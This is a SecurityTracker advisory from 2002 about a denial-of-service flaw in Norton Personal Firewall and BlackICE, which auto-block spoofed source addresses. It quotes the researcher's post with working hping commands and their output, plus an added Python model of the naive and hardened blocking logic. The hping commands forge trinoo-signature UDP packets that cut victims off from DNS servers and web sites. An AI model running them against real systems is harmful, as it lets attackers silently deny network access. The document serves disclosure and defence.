SecurityTracker.com

SecurityTracker
Archives


 


Category:   Application (Firewall)  >   Norton Personal Firewall
Vendors:   Symantec
Symantec's Norton Personal Firewall Lets Remote Users Cause the Firewall to Block Valid Packets
SecurityTracker Alert ID:  1005391
SecurityTracker URL:  http://securitytracker.com/id/1005391
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Oct 9 2002
Impact:   Denial of service via network
Exploit Included:  Yes  
Version(s): 2002 (version 4.0)
Description:   A denial of service vulnerability was reported in Symantec's Norton Personal Firewall software. A remote user can send forged packets that cause the firewall's automatic blocking feature to block packets from a legitimate address.

It is reported that a remote user can send a specially crafted packet with a spoofed source address to cause the firewall to block all subsequent traffic from the spoofed address. The crafted packet must match one of the firewall's signatures for well-known attack tools (e.g., trinoo agent traffic on UDP port 31335). According to the report, the firewall adds the spoofed address to its block list as soon as the packet is received, without any further check, and from then on drops every packet originating from the valid address. Because the source address of a single UDP datagram is not authenticated, any address the attacker chooses, including the victim's DNS server, can be made unreachable in this way; the report demonstrates this against the victim's DNS server as well as against public web sites.

A demonstration exploit command using the hping utility (http://www.hping.org/) is provided. The command used against BlackICE sends five forged trinoo "PONG" UDP packets with a spoofed source address:

hping -p 31335 -e PONG -2 ip.add.of.victim -c 5 -d 4 -a ip.add.of.server.to.be.blocked

The report states that the Norton Personal Firewall test was almost the same, using the following command instead:

hping -e 13 -d 2 -s 6000 -p 2140 -2 ip.of.remote.victimpc -c 2 -a ip.of.spoofed.address

The vendor has reportedly been notified.
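The following is an added example, not code from the SecurityTracker entry or from the original post: a small model of a personal firewall's auto-block logic that shows why keying a block rule on the source address of one unauthenticated UDP packet is a state error. It builds the same kind of datagram the post's hping command forges (UDP to port 31335 carrying "PONG", with an arbitrary source address), runs it through a naive auto-block policy and through two hardened variants, and then checks whether a genuine DNS reply from the spoofed address still gets through. The trinoo port and payload come from the post; the addresses (RFC 5737 documentation ranges), the class and function names, and the hardened policies are assumptions made for the demo.

```python
import socket
import struct
from dataclasses import dataclass, field

# Signature the post's hping command forges: trinoo agent traffic is UDP to
# port 31335 carrying "PONG" (hping -2 -p 31335 -e PONG -d 4).
TRINOO_PORT = 31335
TRINOO_PAYLOAD = b"PONG"


def ip_checksum(hdr: bytes) -> int:
    """RFC 791 one's-complement checksum over an IPv4 header."""
    if len(hdr) % 2:
        hdr += b"\0"
    total = sum(struct.unpack("!%dH" % (len(hdr) // 2), hdr))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def build_udp_packet(src_ip, dst_ip, sport, dport, payload):
    """Build an IPv4+UDP datagram with an arbitrary source address, as
    hping -2 -a <spoofed> does.  Nothing is sent; the bytes are constructed
    locally for inspection (UDP checksum 0 = none, allowed on IPv4)."""
    udp = struct.pack("!HHHH", sport, dport, 8 + len(payload), 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(udp), 0x1234, 0, 64,
                     socket.IPPROTO_UDP, 0,
                     socket.inet_aton(src_ip), socket.inet_aton(dst_ip))
    ip = ip[:10] + struct.pack("!H", ip_checksum(ip)) + ip[12:]
    return ip + udp


def parse_udp_packet(pkt):
    """Return (src, dst, sport, dport, payload) from a raw IPv4/UDP packet."""
    ver_ihl, _, _, _, _, _, proto, _, src, dst = struct.unpack(
        "!BBHHHBBH4s4s", pkt[:20])
    ihl = (ver_ihl & 0x0F) * 4
    if proto != socket.IPPROTO_UDP:
        raise ValueError("not a UDP packet")
    sport, dport, ulen, _ = struct.unpack("!HHHH", pkt[ihl:ihl + 8])
    return (socket.inet_ntoa(src), socket.inet_ntoa(dst), sport, dport,
            pkt[ihl + 8:ihl + ulen])


def is_trinoo(dport, payload):
    return dport == TRINOO_PORT and payload == TRINOO_PAYLOAD


@dataclass
class AutoBlockFirewall:
    """Hypothetical auto-block engine.  Default settings reproduce the naive
    behaviour the post describes: any packet matching an attack signature
    gets its source address blocked outright."""
    stateless_autoblock: bool = True        # trust the UDP source field
    never_block: frozenset = frozenset()    # infrastructure exemptions
    blocked: set = field(default_factory=set)

    def inspect(self, pkt):
        """Return 'ACCEPT' or 'DROP' for pkt and update the block list."""
        src, _, _, dport, payload = parse_udp_packet(pkt)
        if src in self.blocked:
            return "DROP"
        if is_trinoo(dport, payload):
            # The source field of a UDP datagram is unauthenticated: whoever
            # sends the packet chooses it.  A block rule keyed on it lets a
            # third party decide which address the victim can no longer reach.
            if self.stateless_autoblock and src not in self.never_block:
                self.blocked.add(src)
            return "DROP"   # dropping the suspicious packet itself is fine
        return "ACCEPT"


def run_scenario(fw):
    """Spoof one trinoo packet 'from' the DNS server, then check whether a
    genuine DNS reply from that server still reaches the victim."""
    victim, dns = "192.0.2.10", "192.0.2.53"   # constructed addresses
    spoofed = build_udp_packet(dns, victim, 2000, TRINOO_PORT, TRINOO_PAYLOAD)
    fw.inspect(spoofed)
    dns_reply = build_udp_packet(dns, victim, 53, 40000, b"\x12\x34\x81\x80")
    return fw.inspect(dns_reply)


if __name__ == "__main__":
    print("naive auto-block:      ", run_scenario(AutoBlockFirewall()))
    print("no stateless auto-block:", run_scenario(
        AutoBlockFirewall(stateless_autoblock=False)))
    print("DNS server exempted:   ", run_scenario(
        AutoBlockFirewall(never_block=frozenset({"192.0.2.53"}))))
```

Under the naive policy the DNS reply is dropped, which is the effect the report observed; with stateless auto-block disabled (drop the suspicious packet, but do not create a block rule from an address that only a completed TCP handshake could have vouched for), or with the resolver and gateway exempted, the reply gets through. The exemption list is defence in depth only: an attacker can still spoof any other address.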

Impact:   A remote user can cause legitimate packets to be denied by the firewall software.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.symantec.com/sabu/nis/npf/
Cause:   State error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Multiple Vendor PC firewall remote denial of services Vulnerability


Overview
In a default installation, some personal firewall software works with the
auto-block function on, and in this case if you fake a high-level
dangerous attack packet with a spoofed address targeting these PCs, the
firewall will immediately block the spoofed IP address without any
further judgement. Thus an intruder can quickly block a great many
Internet addresses for a victim PC remotely.

Example

Below are the steps and result of the test on BlackICE.

Step 1: A clean and DEFAULT installation of BlackICE Defender for
Server (version 2.9.cap) on a Win2k Server PC whose IP address is
ip.add.of.victim.

Step 2: On a Linux box with hping (free software available from
www.hping.org) installed, perform the following three commands:
---
[root@]# hping -p 31335 -e PONG -2 ip.add.of.victim -c 5 -d 4 -a ip.add.of.dnsserver
HPING ip.add.of.victim (eth0 ip.add.of.victim): udp mode set, 28 headers + 4 data bytes

--- ip.add.of.victim hping statistic ---
5 packets tramitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
[root@]# hping -p 31335 -e PONG -2 ip.add.of.victim -c 5 -d 4 -a www.google.com
HPING ip.add.of.victim (eth0 ip.add.of.victim): udp mode set, 28 headers + 4 data bytes

--- ip.add.of.victim hping statistic ---
5 packets tramitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
[root@]# hping -p 31335 -e PONG -2 ip.add.of.victim -c 5 -d 4 -a www.networkice.com
HPING ip.add.of.victim (eth0 ip.add.of.victim): udp mode set, 28 headers + 4 data bytes

--- ip.add.of.victim hping statistic ---
5 packets tramitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
---
These three commands all do the same thing: send a fake trinoo
communication UDP packet to our target machine ip.add.of.victim with a
spoofed IP address (google, networkice, and ip.add.of.dnsserver, our DNS
server).

Result: Each time the command is executed, the BlackICE icon in the
Windows system tray flashes, and an entry is added automatically in
BlackICE's Advanced Firewall Settings which blocks all packets from the
spoofed address. And the spoofed IP address is unreachable immediately.

The test steps and result for Norton Personal Firewall are almost the
same, using the following command instead:

hping -e 13 -d 2 -s 6000 -p 2140 -2 ip.of.remote.victimpc -c 2 -a ip.of.spoofed.address

Vendor Response
In 2002, Symantec told me they had forwarded my concerns on to the
appropriate team, and BlackICE replied to me: "As the product exists now,
there is nothing that can be done to correct this." And they are hoping
that something can be done in a future release.

Affected Versions:
--
I have tested the following products:

BlackICE Defender for Server version 2.9.cap
BlackICE Server Protection version 3.5.cdf
Norton Personal Firewall 2002 (version 4.0)
All are vulnerable.



 
 
-- 



Yiming Gong 
Senior System Administrator 
China Netcom
yiming@security.zz.ha.cn 
http://security.zz.ha.cn 
0086-371-7934907 



 
 



Copyright 2022, SecurityGlobal.net LLC